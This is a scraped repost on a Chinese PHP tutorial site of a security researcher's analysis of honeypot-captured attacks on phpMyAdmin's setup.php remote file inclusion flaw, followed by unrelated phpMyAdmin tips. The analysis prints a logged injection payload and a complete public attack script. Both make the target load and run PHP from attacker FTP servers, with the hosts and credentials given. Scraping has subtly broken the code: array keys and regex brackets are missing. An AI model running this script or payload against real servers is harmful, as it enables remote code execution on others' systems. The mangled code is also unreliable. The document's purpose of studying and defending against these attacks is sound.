PhpMyAdmin setup.php RFI Attacks Detected-php手册-PHP中文网

首页

php教程

php手册

PhpMyAdmin setup.php RFI Attacks Detected

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 pm 08:00 PM

phpmyadmin

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our central ModSecurity AuditConsole logging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.

PhpMyAdmin setup.php RFI Attacks Detected

Let's look at the raw ModSecurity audit log data of the inbound request:

--4064df0e-A--
[10/Apr/2012:18:05:55 +0000] T4R2gwowybkAAHp9G@sAAAAF 212.24.61.167 38767 XXX.XXX.XXX.XXX 80
--4064df0e-B--
POST /pma/scripts/setup.php HTTP/1.1
Connection: close
Host: 176.34.207.219
Referer: 176.34.207.219
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

--4064df0e-C--
action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22ftp%3A%2F%2Fthewinecompany%3AgXNbUEwfLa%4046%2E32%2E228%2E222%2F%2Ea%2Fid%2Etxt%22%3B%7D%7D

If we URL decode the request body data, we get this:

action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:
{<span><strong>s:6:"source";s:55:"ftp://thewinecompany:gXNbUEwfLa@46.32.228.222/.a/id.txt"</strong></span>;}}

As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site. The contents of the id.txt file is PHP code:

<?php print(base64_decode("c3Q0cjc="));
echo(php_uname());
print(base64_decode("ZjFuMTVo"));
die;
?>

Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack. If the application responds with the output from these PHP commands, then the attacker will proceed with other attacks. SpiderLabs Research was able to find the following script in public forums that launch similar attacks:

/* wtf zmeu was here haha,yeah me... found this sh*t bug on pmasux */
$arguments = getopt("a:b:c");

$pma_setup_url = $arguments[a];
//echo $arguments[a];
$ftp_code = 'ftp://devil:devil@85.10.138.51/c.txt';

//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url;
$path = $parsed_url;
$query = $parsed_url;

($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';

$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);

while (!feof($fp))
{
if($feof_count >=200)
break;

$return .= fread($fp, 4800);
++$feof_count;
}

fclose($fp);
return $return;
}

$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera');

preg_match('@name="token" value="(a-f0-9{32})"@is',$token_page,$token_array);

$token = $token_array[1];

preg_match_all('@Set-Cookie: (<span>^\r\n;</span>+)@is',$token_page,$cookie_array);

$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);

print
send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');

This issue was patched in the php source code with the following update:

PhpMyAdmin setup.php RFI Attacks Detected
By filtering out non-word characters, it would prevent the attacker from injecting the RFI code.

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

phpmyadmin怎么设置主键Apr 07, 2024 pm 02:54 PM

表的主键是一列或多列，用于唯一标识表中每条记录。设置主键的步骤如下：登录 phpMyAdmin。选择数据库和表。勾选要作为主键的列。点击 "保存更改"。主键具有数据完整性、查找速度和关系建模方面的好处。

phpmyadmin怎么添加外键Apr 07, 2024 pm 02:36 PM

在 phpMyAdmin 中添加外键可以通过以下步骤实现：选择包含外键的父表。编辑父表结构，在“列”中添加新列。启用外键约束，选择引用表和键。设置更新/删除操作。保存更改。

phpmyadmin账号密码是什么Apr 07, 2024 pm 01:09 PM

PHPMyAdmin 的默认用户名和密码为 root 和空。为了安全起见，建议更改默认密码。更改密码的方法：1. 登录 PHPMyAdmin；2. 选择 "privileges"；3. 输入新密码并保存。忘记密码时，可通过停止 MySQL 服务并编辑配置文件的方式重置密码：1. 添加 skip-grant-tables 行；2. 登录 MySQL 命令行并重置 root 密码；3. 刷新权限表；4. 删除 skip-grant-tables 行，重启 MySQL 服务。

phpmyadmin怎么删除数据表Apr 07, 2024 pm 03:00 PM

phpMyAdmin 中删除数据表的步骤：选择数据库和数据表；点击“操作”选项卡；选择“删除”选项；确认并执行删除操作。

phpmyadmin日志在哪里Apr 07, 2024 pm 12:57 PM

PHPMyAdmin日志文件的默认位置：Linux/Unix/macOS：/var/log/phpmyadminWindows：C:\xampp\phpMyAdmin\logs\日志文件用途：故障排除审计安全性

为什么phpmyadmin拒绝访问Apr 07, 2024 pm 01:03 PM

phpMyAdmin 拒绝访问的原因及解决方案：认证失败：检查用户名和密码是否正确。服务器配置错误：调整防火墙设置，检查数据库端口是否正确。权限问题：授予用户对数据库的访问权限。会话超时：刷新浏览器页面重新连接。phpMyAdmin 配置错误：检查配置文件和文件权限，确保启用了必需的 Apache 模块。服务器问题：等待一段时间后再重试或联系主机提供商。